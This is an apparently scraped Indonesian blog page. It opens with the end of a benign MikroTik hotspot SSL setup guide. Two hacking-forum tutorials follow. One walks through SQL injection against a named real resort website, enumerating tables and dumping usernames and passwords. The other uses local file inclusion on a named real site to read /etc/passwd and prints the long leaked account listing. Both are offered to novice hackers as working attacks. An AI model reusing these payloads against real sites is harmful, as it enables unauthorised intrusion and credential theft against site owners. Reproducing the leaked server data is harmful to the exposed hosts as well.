    Common Name (eg, your name or your server’s hostname) []:uiiaccess.uii.ac.id 
    Email Address []:kusprayitna@staff.uii.ac.id 
 
    Please enter the following ‘extra’ attributes 
    to be sent with your certificate request 
    A challenge password []:<password> 
    An optional company name []:Badan Sistem Informasi</code></blockquote>
–> akan dibuat file hotspot.csr berdasar hotspot.key 
 
3. Membuat certifikat sendiri 
 
# openssl x509 -req -days 10000 -in hotspot.csr -signkey hotspot.key -out hotspot.crt 
<blockquote class="tr_bq">
<code>Signature ok 
subject=/C=ID/ST=DIY/L=Yogyakarta/O=UII/CN=uiiaccess.uii.ac.id/emailAddress=kusprayitna@staff.uii.ac.id 
Getting Private key 
Enter pass phrase for hotspot.key: <password></code></blockquote>
–> akan dibuat file sertifikat ssl hotspot.crt berdasar point 1 dan 2 
 
4. Upload file hotspot.key dan hotspot.crt ke server router mikrotik dengan menggunakan FTP 
 
B. Instalasi sertifikat di mikrotik 
 
1. Masuk ke terminal mikrotik dan import sertifikat : 
<blockquote class="tr_bq">
<code>/certificate import file-name=hotspot.crt 
    passphrase: <password> 
    certificates-imported: 1 
    private-keys-imported: 0 
    files-imported: 1 
    decryption-failures: 0 
    keys-with-no-certificate: 0 
 
    /certificate import file-name=hotspot.key 
    passphrase: <password> 
    certificates-imported: 0 
    private-keys-imported: 1 
    files-imported: 1 
    decryption-failures: 0 
    keys-with-no-certificate: 0</code></blockquote>
2. Lihat hasil import 
<blockquote class="tr_bq">
<code>/certificate print 
    Flags: K - decrypted-private-key, Q - private-key, R - rsa, D - dsa 
 
    0 KR name=”cert1″ subject=C=ID,ST=DIY,L=Yogyakarta,O=UII,CN=uiiaccess.uii.ac.id 
    , 
    emailAddress=kusprayitna@staff.uii.ac.id 
    issuer=C=ID,ST=DIY,L=Yogyakarta,O=UII,CN=uiiaccess.uii.ac.id, 
    emailAddress=kusprayitna@staff.uii.ac.id 
    serial-number=”C085DEEAA752A0EF” email=kusprayitna@staff.uii.ac.id 
    invalid-before=mar/09/2010 18:07:36 invalid-after=jul/25/2037 18:07:36 
    ca=yes</code></blockquote>
7. Set koneksi www-ssl dengan sertifikat cert1 yang barusan di import 
<blockquote class="tr_bq">
<code>/ip service set www-ssl certificate=cert1</code></blockquote>
8. Jika masih disable www=ssl maka aktifkan 
<blockquote class="tr_bq">
<code>/ip service set www-ssl disabled=no</code></blockquote>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://kusprayitna.staff.uii.ac.id/files/2010/03/mikrotik-ssl-https-aktifasi.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="170" src="http://kusprayitna.staff.uii.ac.id/files/2010/03/mikrotik-ssl-https-aktifasi.jpg" width="320" /></a></div>
<blockquote class="tr_bq">
<div class="separator" style="clear: both; text-align: center;">
<a href="http://kusprayitna.staff.uii.ac.id/files/2010/03/mikrotik-ip-services-cert.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="277" src="http://kusprayitna.staff.uii.ac.id/files/2010/03/mikrotik-ip-services-cert.jpg" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://kusprayitna.staff.uii.ac.id/files/2010/03/mikrotik-ip-services-cert-setup.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://kusprayitna.staff.uii.ac.id/files/2010/03/mikrotik-ip-services-cert-setup.jpg" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://kusprayitna.staff.uii.ac.id/files/2010/03/mikrotik-ssl-https-aktifasi.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="170" src="http://kusprayitna.staff.uii.ac.id/files/2010/03/mikrotik-ssl-https-aktifasi.jpg" width="320" /></a></div>
</blockquote>
 <a href="http://kusprayitna.staff.uii.ac.id/2010/03/12/membuat-login-hotspot-mikrotik-dengan-ssl-agar-lebih-aman/" target="_blank">Sumber</a>

Membuat login hotspot mikrotik dengan SSL agar lebih aman

Sabagai salah satu tahapan finishing setup mikrotik, maka diperlukan koneksi tersandi ke hotspot mikrotik. Ini sangat penting karena dengan integrasi otentifikasi mikrotik dengan radius dan LDAP yang …

09 Feb 2012

SQL Injection For Newbie

Salam Paradic3z 
 
okeh di mulai aja dah 
ini tutor dari om cangcimen.. <img alt="piss" border="0" src="http://devilzc0de.org/forum/images/smilies/005.gif" style="vertical-align: middle;" title="piss" /> 
ane bikin thread kali ini buat para calon-calon hacker muda yang baru 
tau dan pengen mendalami tentang SQl injection ( gaya banget ya ane) <img alt="piss" border="0" src="http://devilzc0de.org/forum/images/smilies/005.gif" style="vertical-align: middle;" title="piss" /> , untuk para dewa (dewa19 kaleee <img alt="ketawa" border="0" src="http://devilzc0de.org/forum/images/smilies/ketawa.gif" style="vertical-align: middle;" title="ketawa" />) ngga usah liat juga gpp, tapi alangkah baiknya bisa menasehati dan menyarankan untuk daun muda (kaya ane). 
 
sebenernya udah ada thread yang kaya begini, tapi ane mencoba merefresh aja lagi, semoga diijin kan sama om dewa-dewa (amiinnn) 
 
RULE: 
1. Harus pake gambar untuk memberikan tutorial(biar para daun muda bisa belajar <img alt="ketawa" border="0" src="http://devilzc0de.org/forum/images/smilies/ketawa.gif" style="vertical-align: middle;" title="ketawa" />) kalo bertanya bebas 
2. Harus jelas dalam bertanya dan memberikan tutorial 
3. Kalo post itu memang bermanfaat buat kalian yg pembaca alangkah baiknya di berikan cendol 
 
kalo beitu langsung aja deh, sekarang ane duluan 
<blockquote class="tr_bq">
<code>target : www.canseburesort.co.id</code></blockquote>
dari alamt website ini terdapat celah Sqli, 
<blockquote class="tr_bq">
 
<code>www.canseburesort.co.id/?id_page=6&id_berita=15</code> </blockquote>
<blockquote class="tr_bq">
<div class="separator" style="clear: both; text-align: center;">
<a href="http://oi41.tinypic.com/6schhh.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="168" src="http://oi41.tinypic.com/6schhh.jpg" width="320" /></a></div>
</blockquote>
 seperti biasa untuk mengecek apa itu vuln terhadap SQLI kita uji coba pake single quote ' 
<blockquote class="tr_bq">
<code>www.canseburesort.co.id/?id_page=6&id_berita=15'</code></blockquote>
<blockquote class="tr_bq">
<div class="separator" style="clear: both; text-align: center;">
<a href="http://oi40.tinypic.com/2zgddom.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="184" src="http://oi40.tinypic.com/2zgddom.jpg" width="320" /></a></div>
</blockquote>
yoman ternyata ini benar ada pesan error itu.. 
di lanjut kalo gitu, untuk mengecek berapa jumpaj kolom kita menggunakan order by 
<blockquote class="tr_bq">
<code>id_berita=-15 order by 1-- 
 id_berita=-15 order by 2-- 
 id_berita=-15 order by 3-- 
 id_berita=-15 order by 4-- 
| 
|sampai 
| 
 id_berita=-15 order by 9--</code></blockquote>
berikut gambar ketika menggunakan 
<blockquote class="tr_bq">
<code>id_berita=-15 order by 1--</code> </blockquote>
<blockquote class="tr_bq">
<div class="separator" style="clear: both; text-align: center;">
<a href="http://oi44.tinypic.com/35lrx35.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="155" src="http://oi44.tinypic.com/35lrx35.jpg" width="320" /></a></div>
 </blockquote>
 dan ini ketika kita menggunakan  
<blockquote class="tr_bq">
<code>id_berita=-15 order by 9--</code></blockquote>
<blockquote class="tr_bq">
<div class="separator" style="clear: both; text-align: center;">
<a href="http://oi42.tinypic.com/35krj8w.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="164" src="http://oi42.tinypic.com/35krj8w.jpg" width="320" /></a></div>
</blockquote>
okeh sekarang kita udah dapet jumlah kolomnya, jumlah kolom = 8 karena pas kita lagi cek di order by 9 keluar error itu berarti jumlah kolomnya ada 8 tapi kalo sewaktu-waktu kita menggunakan order by 9 (n)
 berarti jumlah kolomnya di kurang satu, ini untuk contoh kasus yang 
kaya ane ya, karena ngga semua sama tergantung dari pesan error yang di 
keluarin (sok tau banget <img alt="ketawa" border="0" src="http://devilzc0de.org/forum/images/smilies/ketawa.gif" style="vertical-align: middle;" title="ketawa" />) 
 
lanjut... 
setelah kita dapet jumlah kolom kita menggunakan perintah union untuk mendapat kan the magic number 
<blockquote class="tr_bq">
<code>id_berita=-15 union all select 1,2,3,4,5,6,7,8-- 
angka-angka itu tergantung jumlah kolom ya</code></blockquote>
<blockquote class="tr_bq">
<div class="separator" style="clear: both; text-align: center;">
<a href="http://oi42.tinypic.com/1zbxpo8.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="160" src="http://oi42.tinypic.com/1zbxpo8.jpg" width="320" /></a></div>
</blockquote>
the magic numbers = 3,4,5 
dari angka itu kita bakalan dapet informasi sepert: 
versi : version() 
user : user() 
database : database() 
nama tabel : table_name 
nama kolom : column_name 
dll 
 
okeh di lanjut ya, sekarang kita pengen tau versi berapa dan apa nama databasenya 
<blockquote class="tr_bq">
<code>id_berita=-15 union all select 1,2,3,4,group_concat(version(),database()),6,7,8-- 
ane pake magic number 5</code></blockquote>
<blockquote class="tr_bq">
<div class="separator" style="clear: both; text-align: center;">
<a href="http://oi43.tinypic.com/t8rvoy.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="161" src="http://oi43.tinypic.com/t8rvoy.jpg" width="320" /></a></div>
</blockquote>
lanjut lagi kita pengen tau ada tabel apa aja ya 
<blockquote class="tr_bq">
<code>id_berita=-15 union all select 
1,2,3,4,group_concat(table_name),6,7,8 from information_schema.tables 
where table_schema=database()-- 
ane pake magic number 5</code></blockquote>
<blockquote class="tr_bq">
<div class="separator" style="clear: both; text-align: center;">
<a href="http://oi40.tinypic.com/16hlrog.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="148" src="http://oi40.tinypic.com/16hlrog.jpg" width="320" /></a></div>
</blockquote>
kita dapetin tuh nama tablenya: 
<blockquote class="tr_bq">
additional_menu, 
adm_page, 
ads_banner, 
amazing_camp, 
artikel, 
banner, 
client_category, 
client_image, 
galery, 
galery_category, 
lib_news, 
lib_page, 
lib_promo, 
menu_child, 
nav_menu, 
news, 
price_room, 
promotion, 
room_galery, 
user_account</blockquote>
 ini dia yg kita cari-cari dari nama-nama tabel di atas ane pilih yang user_account karena kelihatannya menyimpan akses buat login (mudah-mudahan bisa <img alt="ketawa" border="0" src="http://devilzc0de.org/forum/images/smilies/ketawa.gif" style="vertical-align: middle;" title="ketawa" />) 
 
sebelum kita mendapatkan nama kolom kita harus mengganti nama tabel user_account dalam bentuk <a href="http://www.swingnote.com/tools/texttohex.php" target="_blank">hex</a> : 
<blockquote class="tr_bq">
<code>user_account = 0x757365725f6163636f756e74</code> </blockquote>
maka jadi seperti ini 
<blockquote class="tr_bq">
<code>id_berita=-15 union all select 
1,2,3,4,group_concat(column_name),6,7,8 from information_schema.columns 
where table_name= 0x757365725f6163636f756e74-- 
ane pake magic number 5</code> </blockquote>
<img alt="ngakak" border="0" src="http://devilzc0de.org/forum/images/smilies/ngakak.gif" style="vertical-align: middle;" title="ngakak" /> dapet juga tuh, sekarang kita liat password sama usernamenya 
<blockquote class="tr_bq">
<code>id_berita=-15 union all select 1,2,3,4,group_concat(username,0x3a,password),6,7,8 from user_account-- 
ane pake magic number 5</code></blockquote>
<blockquote class="tr_bq">
<div class="separator" style="clear: both; text-align: center;">
<a href="http://oi43.tinypic.com/r0doah.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="163" src="http://oi43.tinypic.com/r0doah.jpg" width="320" /></a></div>
</blockquote>
akhirnya kita udah dapet itu username sma passwordnya <img alt="ketawa" border="0" src="http://devilzc0de.org/forum/images/smilies/ketawa.gif" style="vertical-align: middle;" title="ketawa" /> 
kalo beruntung kita bisa decrypt itu username sama password <img alt="ketawa" border="0" src="http://devilzc0de.org/forum/images/smilies/ketawa.gif" style="vertical-align: middle;" title="ketawa" /> tapi kalo ngga bisa ya pasrah <img alt="mewek" border="0" src="http://devilzc0de.org/forum/images/smilies/mewek.gif" style="vertical-align: middle;" title="mewek" /> 
demikian penjelasan dari ane, terimakasih atas perhatiannya dan juga 
ane minta maaf kalo banyak kekurangan dalam memberikan tutor dan dalam 
hal penulisannya... 
 
semoga membantu para daun muda DC <img alt="ketawa" border="0" src="http://devilzc0de.org/forum/images/smilies/ketawa.gif" style="vertical-align: middle;" title="ketawa" /> (amin) 
di tunggu hasil kreasi kalian semuanya.. 
jangan lupa di cendolin yak... <img alt="ketawa" border="0" src="http://devilzc0de.org/forum/images/smilies/ketawa.gif" style="vertical-align: middle;" title="ketawa" /> 
 
----Terima Kasih DC---- 
 
<blockquote class="tr_bq">
</blockquote>
<blockquote class="tr_bq">
</blockquote>

SQL Injection For Newbie

Salam Paradic3z okeh di mulai aja dah ini tutor dari om cangcimen.. ane bikin thread kali ini buat para calon-calon hacker muda yang baru tau dan pengen mendalami tentang SQl injection ( gaya bang…

08 Feb 2012

From LFI+Backdoor+Deface

selamat malam teman-teman P-D 
 
malem ini ane mau coba praktekin tentang LFI (local file inclusion), 
sebenernya udah banyak juga sih di sini yang ngebahas tetang LFI, tapi 
ane mau coba lagi nge-refresh aja... 
 
okeh langsung aja, LFI merupakan sebuah lubang pada site di mana 
attacker bisa mengakses semua file di dalam server dengan hanya melalui 
URL, ada pun beberapa syarat yang kiranya mendukung serangan ini 
 
<blockquote class="tr_bq">
include(); 
include_once(); 
require(); 
require_once(); 
dan konfigurasi server 
allow_url_include = on 
allow_url_fopen = on 
magic_quotes_gpc = off  </blockquote>
sekarang kita coba praktekkan ini, 
<a href="http://titiandamai.or.id/konten.php?nama=Riset&op=download_http&nama_file=Miqdad%20-Final%20Report%20FES.pdf-Final%20Report%20FES.pdf" target="_blank">TARGET</a> 
terus kita ganti Miqdad -Final Report FES.pdf 
<blockquote class="tr_bq">
../../../../../../../../../../../etc/passwd</blockquote>
Maka nanti kita akan men-download file itu 
<blockquote class="tr_bq">
root:x:0:0:root:/root:/bin/bash 
daemon:x:1:1:daemon:/usr/sbin:/bin/sh 
bin:x:2:2:bin:/bin:/bin/sh 
sys:x:3:3:sys:/dev:/bin/sh 
sync:x:4:65534:sync:/bin:/bin/sync 
games:x:5:60:games:/usr/games:/bin/sh 
man:x:6:12:man:/var/cache/man:/bin/sh 
lp:x:7:7:lp:/var/spool/lpd:/bin/sh 
mail:x:8:8:mail:/var/mail:/bin/sh 
news:x:9:9:news:/var/spool/news:/bin/sh 
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh 
proxy:x:13:13:proxy:/bin:/bin/sh 
www-data:x:33:33:www-data:/var/www:/bin/sh 
backup:x:34:34:backup:/var/backups:/bin/sh 
list:x:38:38:Mailing List Manager:/var/list:/bin/sh 
irc:x:39:39:ircd:/var/run/ircd:/bin/sh 
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh 
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh 
Debian-exim:x:100:102::/var/spool/exim4:/bin/false 
statd:x:101:65534::/var/lib/nfs:/bin/false 
identd:x:102:65534::/var/run/identd:/bin/false 
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin 
s10002:x:1000:1000::/home/s10002:/bin/bash 
s10003:x:1001:1001::/home/s10003:/bin/bash 
s10005:x:1002:1002::/home/s10005:/bin/bash 
s10009:x:1003:1003::/home/s10009:/bin/bash 
s10010:x:1004:1004::/home/s10010:/bin/bash 
s10016:x:1007:1007::/home/s10016:/bin/bash 
s10019:x:1010:1010::/home/s10019:/bin/bash 
s10020:x:1011:1011::/home/s10020:/bin/bash 
s10022:x:1013:1013::/home/s10022:/bin/bash 
s10027:x:1014:1014::/home/s10027:/bin/bash 
s10029:x:1016:1016::/home/s10029:/bin/bash 
s10030:x:1017:1017::/home/s10030:/bin/bash 
s10031:x:1018:1018::/home/s10031:/bin/bash 
s10032:x:1019:1019::/home/s10032:/bin/bash 
spanel-cgi:x:1021:1028::/:/bin/bash 
spanel-data:x:1022:1029::/home/spanel-data:/bin/bash 
spanel-backup:x:1023:1030::/home/spanel-backup:/bin/bash 
mysql:x:104:115:MySQL Server,,,:/var/lib/mysql:/bin/false 
alias:x:64010:65534:qmail alias,,,:/var/qmail/alias:/bin/sh 
qmaild:x:64011:65534:qmail daemon,,,:/var/qmail:/bin/sh 
qmails:x:64012:64010:qmail send,,,:/var/qmail:/bin/sh 
qmailr:x:64013:64010:qmail remote,,,:/var/qmail:/bin/sh 
qmailq:x:64014:64010:qmail queue,,,:/var/qmail:/bin/sh 
qmaill:x:64015:65534:qmail log,,,:/var/qmail:/bin/sh 
qmailp:x:64016:65534:qmail pw,,,:/var/qmail:/bin/sh 
bind:x:105:116::/var/cache/bind:/bin/false 
ntp:x:106:117::/home/ntp:/bin/false 
proftpd:x:107:65534::/var/run/proftpd:/bin/false 
ftp:x:108:65534::/home/ftp:/bin/false 
dnslog:x:109:65534:djbdns log user,,,:/var/log/dns:/bin/false 
dnscache:x:110:65534:dnscache daemon,,,:/etc/dnscache:/bin/false 
tinydns:x:111:65534:tinydns daemon,,,:/etc/tinydns:/bin/false 
axfrdns:x:112:65534:axfrdns daemon,,,:/etc/axfrdns:/bin/false 
clamav:x:113:118::/var/lib/clamav:/bin/false 
postgres:x:114:120:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash 
server2403:x:1024:1031::/home/sloki/user/server2403/home:/bin/bash 
cgi-server2403:x:1025:1031::/:/bin/false 
h12273:x:1039:1040::/u/h12273/home:/c/bin/notifynoshell 
cgi-h12273:x:1040:1040::/:/bin/false 
h78649:x:1045:1043::/u/h78649/home:/c/bin/notifynoshell 
cgi-h78649:x:1046:1043::/:/bin/false 
h90547:x:1047:1044::/u/h90547/home:/c/bin/notifynoshell 
cgi-h90547:x:1048:1044::/:/bin/false 
h72019:x:1053:1047::/u/h72019/home:/c/bin/notifynoshell 
cgi-h72019:x:1054:1047::/:/bin/false 
h65690:x:1055:1048::/u/h65690/home:/bin/bash 
cgi-h65690:x:1056:1048::/:/bin/false 
h21758:x:1057:1049::/u/h21758/home:/c/bin/notifynoshell 
cgi-h21758:x:1058:1049::/:/bin/false 
h61460:x:1071:1056::/u/h61460/home:/c/bin/notifynoshell 
cgi-h61460:x:1072:1056::/:/bin/false 
h85875:x:1073:1057::/u/h85875/home:/bin/bash 
cgi-h85875:x:1074:1057::/:/bin/false 
h04394:x:1075:1058::/u/h04394/home:/c/bin/notifynoshell 
cgi-h04394:x:1076:1058::/:/bin/false 
h34833:x:1085:1063::/u/h34833/home:/c/bin/notifynoshell 
cgi-h34833:x:1086:1063::/:/bin/false 
h33047:x:1091:1066::/u/h33047/home:/bin/bash 
cgi-h33047:x:1092:1066::/:/bin/false 
h71205:x:1111:1076::/u/h71205/home:/bin/bash 
cgi-h71205:x:1112:1076::/:/bin/false 
h29411:x:1117:1079::/u/h29411/home:/c/bin/notifynoshell 
cgi-h29411:x:1118:1079::/:/bin/false 
h62973:x:1121:1081::/u/h62973/home:/c/bin/notifynoshell 
cgi-h62973:x:1122:1081::/:/bin/false 
h70486:x:1123:1082::/u/h70486/home:/c/bin/notifynoshell 
cgi-h70486:x:1124:1082::/:/bin/false 
h03408:x:1139:1090::/u/h03408/home:/c/bin/notifynoshell 
cgi-h03408:x:1140:1090::/:/bin/false 
h29387:x:1151:1096::/u/h29387/home:/c/bin/notifynoshell 
cgi-h29387:x:1152:1096::/:/bin/false 
h12481:x:1185:1113::/u/h12481/home:/bin/bash 
cgi-h12481:x:1186:1113::/:/bin/false 
h65178:x:1187:1114::/u/h65178/home:/c/bin/notifynoshell 
cgi-h65178:x:1188:1114::/:/bin/false 
h52908:x:42751:42718::/u/h52908/home:/c/bin/notifymigrating 
cgi-h52908:x:42752:42718::/:/bin/false 
h98412:x:42753:42719::/u/h98412/home:/c/bin/notifynoshell 
cgi-h98412:x:42754:42719::/:/bin/false 
h75683:x:42765:42725::/u/h75683/home:/bin/bash 
cgi-h75683:x:42766:42725::/:/bin/false 
h23761:x:42769:42727::/u/h23761/home:/c/bin/notifynoshell 
cgi-h23761:x:42770:42727::/:/bin/false 
h48911:x:42795:42740::/u/h48911/home:/bin/bash 
cgi-h48911:x:42796:42740::/:/bin/false 
h70412:x:42813:42749::/u/h70412/home:/c/bin/notifymigrated 
cgi-h70412:x:42814:42749::/:/bin/false 
h30899:x:42819:42752::/u/h30899/home:/c/bin/notifynoshell 
cgi-h30899:x:42820:42752::/:/bin/false 
h21318:x:42821:42753::/u/h21318/home:/c/bin/notifynoshell 
cgi-h21318:x:42822:42753::/:/bin/false 
h80746:x:42823:42754::/u/h80746/home:/c/bin/notifynoshell 
cgi-h80746:x:42824:42754::/:/bin/false 
h30198:x:42845:42765::/u/h30198/home:/c/bin/notifynoshell 
cgi-h30198:x:42846:42765::/:/bin/false 
h27753:x:42849:42767::/u/h27753/home:/c/bin/notifynoshell 
cgi-h27753:x:42850:42767::/:/bin/false 
h59332:x:42853:42769::/u/h59332/home:/c/bin/notifynoshell 
cgi-h59332:x:42854:42769::/:/bin/false 
h24770:x:42855:42770::/u/h24770/home:/c/bin/notifynoshell 
cgi-h24770:x:42856:42770::/:/bin/false 
h79618:x:42877:42781::/u/h79618/home:/c/bin/notifynoshell 
cgi-h79618:x:42878:42781::/:/bin/false 
h77316:x:42885:42785::/u/h77316/home:/bin/bash 
cgi-h77316:x:42886:42785::/:/bin/false 
h80346:x:42893:42789::/u/h80346/home:/c/bin/notifydisable 
cgi-h80346:x:42894:42789::/:/bin/false 
h04471:x:42903:42794::/u/h04471/home:/c/bin/notifynoshell 
cgi-h04471:x:42904:42794::/:/bin/false 
h34645:x:42909:42797::/u/h34645/home:/c/bin/notifynoshell 
cgi-h34645:x:42910:42797::/:/bin/false 
h60315:x:42915:42800::/u/h60315/home:/c/bin/notifynoshell 
cgi-h60315:x:42916:42800::/:/bin/false 
h22858:x:42949:42817::/u/h22858/home:/bin/bash 
cgi-h22858:x:42950:42817::/:/bin/false 
h16836:x:42959:42822::/u/h16836/home:/bin/bash 
cgi-h16836:x:42960:42822::/:/bin/false 
h83948:x:42971:42828::/u/h83948/home:/c/bin/notifynoshell 
cgi-h83948:x:42972:42828::/:/bin/false 
h97494:x:42977:42831::/u/h97494/home:/c/bin/notifynoshell 
cgi-h97494:x:42978:42831::/:/bin/false 
h83104:x:42981:42833::/u/h83104/home:/c/bin/notifynoshell 
cgi-h83104:x:42982:42833::/:/bin/false 
h71568:x:42993:42839::/u/h71568/home:/bin/bash 
cgi-h71568:x:42994:42839::/:/bin/false 
h64669:x:42995:42840::/u/h64669/home:/c/bin/notifynoshell 
cgi-h64669:x:42996:42840::/:/bin/false 
h83898:x:43003:42844::/u/h83898/home:/bin/bash 
cgi-h83898:x:43004:42844::/:/bin/false 
h05829:x:43023:42854::/u/h05829/home:/c/bin/notifynoshell 
cgi-h05829:x:43024:42854::/:/bin/false 
h52620:x:43025:42855::/u/h52620/home:/c/bin/notifynoshell 
cgi-h52620:x:43026:42855::/:/bin/false 
h02485:x:43031:42858::/u/h02485/home:/c/bin/notifynoshell 
cgi-h02485:x:43032:42858::/:/bin/false 
h89337:x:43049:42867::/u/h89337/home:/c/bin/notifymigrated 
cgi-h89337:x:43050:42867::/:/bin/false 
h54520:x:43059:42872::/u/h54520/home:/bin/bash 
cgi-h54520:x:43060:42872::/:/bin/false 
h09018:x:43063:42874::/u/h09018/home:/c/bin/notifynoshell 
cgi-h09018:x:43064:42874::/:/bin/false 
h25606:x:43067:42876::/u/h25606/home:/c/bin/notifynoshell 
cgi-h25606:x:43068:42876::/:/bin/false 
h58868:x:43069:42877::/u/h58868/home:/c/bin/notifynoshell 
cgi-h58868:x:43070:42877::/:/bin/false 
h25210:x:43075:42880::/u/h25210/home:/c/bin/notifynoshell 
cgi-h25210:x:43076:42880::/:/bin/false 
h93604:x:43083:42884::/u/h93604/home:/c/bin/notifynoshell 
cgi-h93604:x:43084:42884::/:/bin/false 
h57787:x:43085:42885::/u/h57787/home:/c/bin/notifynoshell 
cgi-h57787:x:43086:42885::/:/bin/false 
s10035:x:43087:43087::/home/s10035:/bin/bash 
t90354:x:34340:34325::/u/t90354/home:/c/bin/notifydisable 
cgi-t90354:x:43088:34325::/:/bin/false 
s10037:x:43090:43090::/home/s10037:/bin/bash 
s10038:x:43091:43091::/home/s10038:/bin/bash 
server42403:x:43106:43106::/home/sloki/user/server42403/home:/bin/bash 
cgi-server42403:x:43107:43106::/:/bin/false 
s10039:x:43108:43108::/home/s10039:/bin/bash 
h12160:x:43109:43109::/u/h12160/home:/c/bin/notifynoshell 
cgi-h12160:x:43110:43109::/:/bin/false 
h78746:x:43131:43120::/u/h78746/home:/c/bin/notifydisable 
cgi-h78746:x:43132:43120::/:/bin/false 
pdns:x:115:121:PowerDNS,,,:/var/spool/powerdns:/bin/false 
h06229:x:43137:43123::/u/h06229/home:/c/bin/notifynoshell 
cgi-h06229:x:43138:43123::/:/bin/false 
h26502:x:43139:43124::/u/h26502/home:/c/bin/notifynoshell 
cgi-h26502:x:43140:43124::/:/bin/false 
libuuid:x:116:122::/var/lib/libuuid:/bin/sh 
h53424:x:43143:43143::/u/h53424/home:/c/bin/notifynoshell 
cgi-h53424:x:43144:100::/:/bin/false 
h88762:x:43147:43147::/u/h88762/home:/c/bin/notifynoshell 
cgi-h88762:x:43148:100::/:/bin/false 
s10040:x:43149:43149::/home/s10040:/bin/bash 
s10041:x:43150:43150::/home/s10041:/bin/bash 
h52354:x:43155:43155::/u/h52354/home:/c/bin/notifynoshell 
cgi-h52354:x:43156:100::/:/bin/false 
h34010:x:43165:43165::/u/h34010/home:/c/bin/notifynoshell 
cgi-h34010:x:43166:100::/:/bin/false 
h10917:x:43195:43195::/u/h10917/home:/c/bin/notifynoshell 
cgi-h10917:x:43196:100::/:/bin/false 
h57984:x:43199:43199::/u/h57984/home:/bin/bash 
cgi-h57984:x:43200:100::/:/bin/false 
h44050:x:43201:43201::/u/h44050/home:/c/bin/notifynoshell 
cgi-h44050:x:43202:100::/:/bin/false 
h15603:x:43219:43219::/u/h15603/home:/c/bin/notifynoshell 
cgi-h15603:x:43220:100::/:/bin/false 
h72463:x:43221:43221::/u/h72463/home:/bin/bash 
cgi-h72463:x:43222:100::/:/bin/false 
h98593:x:43227:43227::/u/h98593/home:/c/bin/notifynoshell 
cgi-h98593:x:43228:100::/:/bin/false 
h25152:x:43231:43231::/u/h25152/home:/bin/bash 
cgi-h25152:x:43232:100::/:/bin/false 
h58089:x:43235:43235::/u/h58089/home:/c/bin/notifynoshell 
cgi-h58089:x:43236:100::/:/bin/false 
h95034:x:43237:43237::/u/h95034/home:/c/bin/notifynoshell 
cgi-h95034:x:43238:100::/:/bin/false 
h37344:x:43241:43241::/u/h37344/home:/c/bin/notifynoshell 
cgi-h37344:x:43242:100::/:/bin/false 
h36468:x:43245:43245::/u/h36468/home:/c/bin/notifynoshell 
cgi-h36468:x:43246:100::/:/bin/false 
h30192:x:34002:34002::/u/h30192/home:/bin/bash 
cgi-h30192:x:43252:100::/:/bin/false 
h91067:x:43255:43255::/u/h91067/home:/c/bin/notifynoshell 
cgi-h91067:x:43256:100::/:/bin/false 
h56351:x:43265:43265::/u/h56351/home:/c/bin/notifynoshell 
cgi-h56351:x:43266:100::/:/bin/false 
h83201:x:35726:35726::/u/h83201/home:/bin/bash 
cgi-h83201:x:43273:100::/:/bin/false 
h30205:x:43276:43276::/u/h30205/home:/c/bin/notifydisable 
cgi-h30205:x:43277:100::/:/bin/false 
h76606:x:43306:43306::/u/h76606/home:/c/bin/notifynoshell 
cgi-h76606:x:43307:100::/:/bin/false 
h72303:x:43308:43308::/u/h72303/home:/c/bin/notifynoshell 
cgi-h72303:x:43309:100::/:/bin/false 
h58850:x:43310:43310::/u/h58850/home:/bin/bash 
cgi-h58850:x:43311:100::/:/bin/false 
h43653:x:43318:43318::/u/h43653/home:/c/bin/notifynoshell 
cgi-h43653:x:43319:100::/:/bin/false 
h88948:x:43325:43325::/u/h88948/home:/c/bin/notifynoshell 
cgi-h88948:x:43326:100::/:/bin/false 
h69452:x:43331:43331::/u/h69452/home:/c/bin/notifydisable 
cgi-h69452:x:43332:100::/:/bin/false 
h93955:x:43343:43343::/u/h93955/home:/c/bin/notifydisable 
cgi-h93955:x:43344:100::/:/bin/false 
h34580:x:43351:43351::/u/h34580/home:/c/bin/notifydisable 
cgi-h34580:x:43352:100::/:/bin/false 
h94186:x:43353:43353::/u/h94186/home:/c/bin/notifynoshell 
cgi-h94186:x:43354:100::/:/bin/false 
h33073:x:43365:43365::/u/h33073/home:/c/bin/notifymigrated 
cgi-h33073:x:43366:100::/:/bin/false 
h36331:x:43375:43375::/u/h36331/home:/c/bin/notifynoshell 
cgi-h36331:x:43376:100::/:/bin/false 
h77388:x:43381:43381::/u/h77388/home:/c/bin/notifydisable 
cgi-h77388:x:43382:100::/:/bin/false 
h56758:x:43397:43397::/u/h56758/home:/c/bin/notifynoshell 
cgi-h56758:x:43398:100::/:/bin/false 
h15941:x:43405:43405::/u/h15941/home:/c/bin/notifynoshell 
cgi-h15941:x:43406:100::/:/bin/false 
h18164:x:43407:43407::/u/h18164/home:/c/bin/notifynoshell 
cgi-h18164:x:43408:100::/:/bin/false 
s10042:x:43409:43409::/home/s10042:/bin/bash 
h48868:x:43410:43410::/u/h48868/home:/bin/bash 
cgi-h48868:x:43411:100::/:/bin/false 
h01778:x:43414:43414::/u/h01778/home:/c/bin/notifynoshell 
cgi-h01778:x:43415:100::/:/bin/false 
h50253:x:43416:43416::/u/h50253/home:/bin/bash 
cgi-h50253:x:43417:100::/:/bin/false 
